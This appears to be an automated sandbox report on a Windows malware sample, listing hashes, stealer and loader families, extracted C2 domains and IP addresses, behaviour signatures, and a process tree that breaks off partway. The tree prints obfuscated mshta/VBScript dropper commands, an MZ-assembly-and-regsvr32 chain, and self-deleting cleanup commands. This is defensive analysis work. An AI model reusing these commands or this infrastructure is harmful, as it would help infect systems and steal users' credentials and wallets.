Overview

overview

10

Static

static

toolspab2 (1).exe

windows7_x64

10

toolspab2 (1).exe

windows10_x64

10

toolspab2 (10).exe

windows7_x64

10

toolspab2 (10).exe

windows10_x64

10

toolspab2 (11).exe

windows7_x64

10

toolspab2 (11).exe

windows10_x64

10

toolspab2 (12).exe

windows7_x64

10

toolspab2 (12).exe

windows10_x64

10

toolspab2 (13).exe

windows7_x64

10

toolspab2 (13).exe

windows10_x64

10

toolspab2 (14).exe

windows7_x64

10

toolspab2 (14).exe

windows10_x64

10

toolspab2 (15).exe

windows7_x64

10

toolspab2 (15).exe

windows10_x64

10

toolspab2 (16).exe

windows7_x64

10

toolspab2 (16).exe

windows10_x64

10

toolspab2 (17).exe

windows7_x64

10

toolspab2 (17).exe

windows10_x64

10

toolspab2 (18).exe

windows7_x64

10

toolspab2 (18).exe

windows10_x64

10

toolspab2 (19).exe

windows7_x64

10

toolspab2 (19).exe

windows10_x64

10

toolspab2 (2).exe

windows7_x64

10

toolspab2 (2).exe

windows10_x64

10

toolspab2 (20).exe

windows7_x64

10

toolspab2 (20).exe

windows10_x64

10

toolspab2 (21).exe

windows7_x64

10

toolspab2 (21).exe

windows10_x64

10

toolspab2 (22).exe

windows7_x64

10

toolspab2 (22).exe

windows10_x64

10

toolspab2 (23).exe

windows7_x64

10

toolspab2 (23).exe

windows10_x64

10

Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    114s
  • max time network
    233s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-07-2021 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    toolspab2 (11).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Score
10/10
raccoonredlinesmokeloadertofseevidar824agressorseryibackdoordiscoveryevasioninfostealerpersistencespywarestealertrojanvmprotect

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Seryi

C2

185.203.243.131:27365

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    824

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar Stealer 2 IoCs
    stealer
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3212
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3140
  • C:\Users\Admin\AppData\Local\Temp\FBF9.exe
    C:\Users\Admin\AppData\Local\Temp\FBF9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:3456
  • C:\Users\Admin\AppData\Local\Temp\FD62.exe
    C:\Users\Admin\AppData\Local\Temp\FD62.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1172
  • C:\Users\Admin\AppData\Local\Temp\52B7.exe
    C:\Users\Admin\AppData\Local\Temp\52B7.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3976
    • C:\Users\Admin\AppData\Local\Temp\52B7.exe
      C:\Users\Admin\AppData\Local\Temp\52B7.exe
      2⤵
      • Executes dropped EXE
      PID:3780
    • C:\Users\Admin\AppData\Local\Temp\52B7.exe
      C:\Users\Admin\AppData\Local\Temp\52B7.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2120
  • C:\Users\Admin\AppData\Local\Temp\56EE.exe
    C:\Users\Admin\AppData\Local\Temp\56EE.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:3764
  • C:\Users\Admin\AppData\Local\Temp\59CD.exe
    C:\Users\Admin\AppData\Local\Temp\59CD.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3036
  • C:\Users\Admin\AppData\Local\Temp\6121.exe
    C:\Users\Admin\AppData\Local\Temp\6121.exe
    1⤵
    • Executes dropped EXE
    PID:2244
  • C:\Users\Admin\AppData\Local\Temp\670E.exe
    C:\Users\Admin\AppData\Local\Temp\670E.exe
    1⤵
    • Executes dropped EXE
    PID:3084
  • C:\Users\Admin\AppData\Local\Temp\6F7B.exe
    C:\Users\Admin\AppData\Local\Temp\6F7B.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:2396
  • C:\Users\Admin\AppData\Local\Temp\742F.exe
    C:\Users\Admin\AppData\Local\Temp\742F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2184
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
      PID:2968
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:2616
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:3768
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:1464
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:652
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:2676
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:2228
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:364
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:1200
                    • C:\Users\Admin\AppData\Local\Temp\FE11.exe
                      C:\Users\Admin\AppData\Local\Temp\FE11.exe
                      1⤵
                      • Executes dropped EXE
                      PID:812
                      • C:\Users\Admin\AppData\Local\Temp\FE11.exe
                        C:\Users\Admin\AppData\Local\Temp\FE11.exe
                        2⤵
                          PID:1276
                          • C:\Windows\SysWOW64\icacls.exe
                            icacls "C:\Users\Admin\AppData\Local\1891c77e-7d64-4627-a18a-02d53a3156ba" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                            3⤵
                            • Modifies file permissions
                            PID:3696
                          • C:\Users\Admin\AppData\Local\Temp\FE11.exe
                            "C:\Users\Admin\AppData\Local\Temp\FE11.exe" --Admin IsNotAutoStart IsNotTask
                            3⤵
                              PID:4692
                              • C:\Users\Admin\AppData\Local\Temp\FE11.exe
                                "C:\Users\Admin\AppData\Local\Temp\FE11.exe" --Admin IsNotAutoStart IsNotTask
                                4⤵
                                  PID:2172
                                  • C:\Users\Admin\AppData\Local\a7bba401-379e-49ef-9583-f4b47b24ee7a\build2.exe
                                    "C:\Users\Admin\AppData\Local\a7bba401-379e-49ef-9583-f4b47b24ee7a\build2.exe"
                                    5⤵
                                      PID:5232
                                      • C:\Users\Admin\AppData\Local\a7bba401-379e-49ef-9583-f4b47b24ee7a\build2.exe
                                        "C:\Users\Admin\AppData\Local\a7bba401-379e-49ef-9583-f4b47b24ee7a\build2.exe"
                                        6⤵
                                          PID:6656
                              • C:\Users\Admin\AppData\Local\Temp\FEED.exe
                                C:\Users\Admin\AppData\Local\Temp\FEED.exe
                                1⤵
                                • Executes dropped EXE
                                PID:2776
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im FEED.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FEED.exe" & del C:\ProgramData\*.dll & exit
                                  2⤵
                                    PID:4160
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im FEED.exe /f
                                      3⤵
                                      • Kills process with taskkill
                                      PID:4520
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      3⤵
                                      • Delays execution with timeout.exe
                                      PID:4988
                                • C:\Users\Admin\AppData\Local\Temp\16E.exe
                                  C:\Users\Admin\AppData\Local\Temp\16E.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:3168
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\16E.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\16E.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                    2⤵
                                      PID:3740
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\16E.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\16E.exe" ) do taskkill -F -im "%~Nxw"
                                        3⤵
                                          PID:1972
                                          • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                            ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1296
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                              5⤵
                                                PID:1120
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                  6⤵
                                                    PID:2652
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                  5⤵
                                                    PID:692
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                      6⤵
                                                        PID:1856
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                          7⤵
                                                            PID:4004
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                            7⤵
                                                              PID:3660
                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                              regsvr32.exe -S ..\MRZCIH.DO /U
                                                              7⤵
                                                                PID:3964
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill -F -im "16E.exe"
                                                          4⤵
                                                          • Kills process with taskkill
                                                          PID:3548
                                                  • C:\Users\Admin\AppData\Local\Temp\CD9.exe
                                                    C:\Users\Admin\AppData\Local\Temp\CD9.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:2380
                                                  • C:\Users\Admin\AppData\Local\Temp\119D.exe
                                                    C:\Users\Admin\AppData\Local\Temp\119D.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:2688
                                                    • C:\Users\Admin\AppData\Local\Temp\is-7TQOU.tmp\119D.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-7TQOU.tmp\119D.tmp" /SL5="$10222,188175,104448,C:\Users\Admin\AppData\Local\Temp\119D.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1772
                                                      • C:\Users\Admin\AppData\Local\Temp\is-ARG9Q.tmp\134 Vaporeondè_éçè_)))_.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-ARG9Q.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                        3⤵
                                                          PID:4048
                                                          • C:\Program Files\Windows Sidebar\JGMZJJNBLC\irecord.exe
                                                            "C:\Program Files\Windows Sidebar\JGMZJJNBLC\irecord.exe" /VERYSILENT
                                                            4⤵
                                                              PID:4264
                                                              • C:\Users\Admin\AppData\Local\Temp\is-6QFCK.tmp\irecord.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-6QFCK.tmp\irecord.tmp" /SL5="$401F4,5808768,66560,C:\Program Files\Windows Sidebar\JGMZJJNBLC\irecord.exe" /VERYSILENT
                                                                5⤵
                                                                  PID:4348
                                                                  • C:\Program Files (x86)\i-record\I-Record.exe
                                                                    "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                    6⤵
                                                                      PID:4588
                                                                • C:\Users\Admin\AppData\Local\Temp\47-bfa11-2d1-f8cbe-a8f9e71e6c5a2\Molefuxuky.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\47-bfa11-2d1-f8cbe-a8f9e71e6c5a2\Molefuxuky.exe"
                                                                  4⤵
                                                                    PID:4328
                                                                  • C:\Users\Admin\AppData\Local\Temp\0d-f8494-610-e458f-6bab575a19ebf\Xycifugoge.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\0d-f8494-610-e458f-6bab575a19ebf\Xycifugoge.exe"
                                                                    4⤵
                                                                      PID:4416
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\shgymef3.v5p\GcleanerEU.exe /eufive & exit
                                                                        5⤵
                                                                          PID:3396
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qssbrkuv.n2v\installer.exe /qn CAMPAIGN="654" & exit
                                                                          5⤵
                                                                            PID:2392
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bgztilye.vef\Setup3310.exe /Verysilent /subid=623 & exit
                                                                            5⤵
                                                                              PID:4520
                                                                              • C:\Users\Admin\AppData\Local\Temp\bgztilye.vef\Setup3310.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\bgztilye.vef\Setup3310.exe /Verysilent /subid=623
                                                                                6⤵
                                                                                  PID:2652
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-NHRK3.tmp\Setup3310.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-NHRK3.tmp\Setup3310.tmp" /SL5="$102F0,138429,56832,C:\Users\Admin\AppData\Local\Temp\bgztilye.vef\Setup3310.exe" /Verysilent /subid=623
                                                                                    7⤵
                                                                                      PID:3408
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ASG91.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ASG91.tmp\Setup.exe" /Verysilent
                                                                                        8⤵
                                                                                          PID:4248
                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                            9⤵
                                                                                              PID:744
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                10⤵
                                                                                                  PID:6520
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im RunWW.exe /f
                                                                                                    11⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6960
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    11⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5568
                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                9⤵
                                                                                                  PID:812
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-A85AG.tmp\MediaBurner.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-A85AG.tmp\MediaBurner.tmp" /SL5="$104EA,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                    10⤵
                                                                                                      PID:5268
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-S01NC.tmp\_____________bob.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-S01NC.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                                        11⤵
                                                                                                          PID:5276
                                                                                                          • C:\Program Files\Windows NT\HBXYLPDHQX\ultramediaburner.exe
                                                                                                            "C:\Program Files\Windows NT\HBXYLPDHQX\ultramediaburner.exe" /VERYSILENT
                                                                                                            12⤵
                                                                                                              PID:6664
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-R72JM.tmp\ultramediaburner.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-R72JM.tmp\ultramediaburner.tmp" /SL5="$1052C,281924,62464,C:\Program Files\Windows NT\HBXYLPDHQX\ultramediaburner.exe" /VERYSILENT
                                                                                                                13⤵
                                                                                                                  PID:6716
                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                    14⤵
                                                                                                                      PID:6948
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2d-f32d3-598-5a08e-9aff0faf61a17\Cugyryfedo.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2d-f32d3-598-5a08e-9aff0faf61a17\Cugyryfedo.exe"
                                                                                                                  12⤵
                                                                                                                    PID:6764
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\94-ef531-19f-f82a4-07e4d48f6976b\Kanusaecusae.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\94-ef531-19f-f82a4-07e4d48f6976b\Kanusaecusae.exe"
                                                                                                                    12⤵
                                                                                                                      PID:6892
                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                9⤵
                                                                                                                  PID:4100
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-BCHQQ.tmp\lylal220.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-BCHQQ.tmp\lylal220.tmp" /SL5="$3047C,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                    10⤵
                                                                                                                      PID:5260
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SRTNJ.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SRTNJ.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                                                        11⤵
                                                                                                                          PID:5912
                                                                                                                          • C:\Program Files\Mozilla Firefox\JKYWSMAQKF\irecord.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\JKYWSMAQKF\irecord.exe" /VERYSILENT
                                                                                                                            12⤵
                                                                                                                              PID:6368
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PS65M.tmp\irecord.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-PS65M.tmp\irecord.tmp" /SL5="$305B0,5808768,66560,C:\Program Files\Mozilla Firefox\JKYWSMAQKF\irecord.exe" /VERYSILENT
                                                                                                                                13⤵
                                                                                                                                  PID:4260
                                                                                                                                  • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                    "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                    14⤵
                                                                                                                                      PID:4624
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11-4c87f-ba7-4e4b4-789c3c14b8fc1\Nodemuduho.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\11-4c87f-ba7-4e4b4-789c3c14b8fc1\Nodemuduho.exe"
                                                                                                                                  12⤵
                                                                                                                                    PID:3456
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\14-0f71f-675-2279f-0a157f8959b3d\Vihofucawi.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\14-0f71f-675-2279f-0a157f8959b3d\Vihofucawi.exe"
                                                                                                                                    12⤵
                                                                                                                                      PID:7080
                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:5144
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-2LPOM.tmp\LabPicV3.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-2LPOM.tmp\LabPicV3.tmp" /SL5="$204E8,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                    10⤵
                                                                                                                                      PID:5300
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SRTNK.tmp\12(((((.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SRTNK.tmp\12(((((.exe" /S /UID=lab214
                                                                                                                                        11⤵
                                                                                                                                          PID:5792
                                                                                                                                          • C:\Program Files\Windows Sidebar\XBRRCNMKFI\prolab.exe
                                                                                                                                            "C:\Program Files\Windows Sidebar\XBRRCNMKFI\prolab.exe" /VERYSILENT
                                                                                                                                            12⤵
                                                                                                                                              PID:6748
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-0D4D6.tmp\prolab.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-0D4D6.tmp\prolab.tmp" /SL5="$1055C,575243,216576,C:\Program Files\Windows Sidebar\XBRRCNMKFI\prolab.exe" /VERYSILENT
                                                                                                                                                13⤵
                                                                                                                                                  PID:6840
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4a-c5776-e65-8149a-f6b7ea03b1aa3\SHaenysomago.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4a-c5776-e65-8149a-f6b7ea03b1aa3\SHaenysomago.exe"
                                                                                                                                                12⤵
                                                                                                                                                  PID:6832
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\80-9aa73-067-3188c-86de8691abf62\ZHohucaelati.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\80-9aa73-067-3188c-86de8691abf62\ZHohucaelati.exe"
                                                                                                                                                  12⤵
                                                                                                                                                    PID:6996
                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                                                                                                                              9⤵
                                                                                                                                                PID:5164
                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                9⤵
                                                                                                                                                  PID:5152
                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                                                                                                                                    10⤵
                                                                                                                                                      PID:4464
                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:4460
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7680524.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7680524.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5724
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3729100.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3729100.exe"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:5156
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
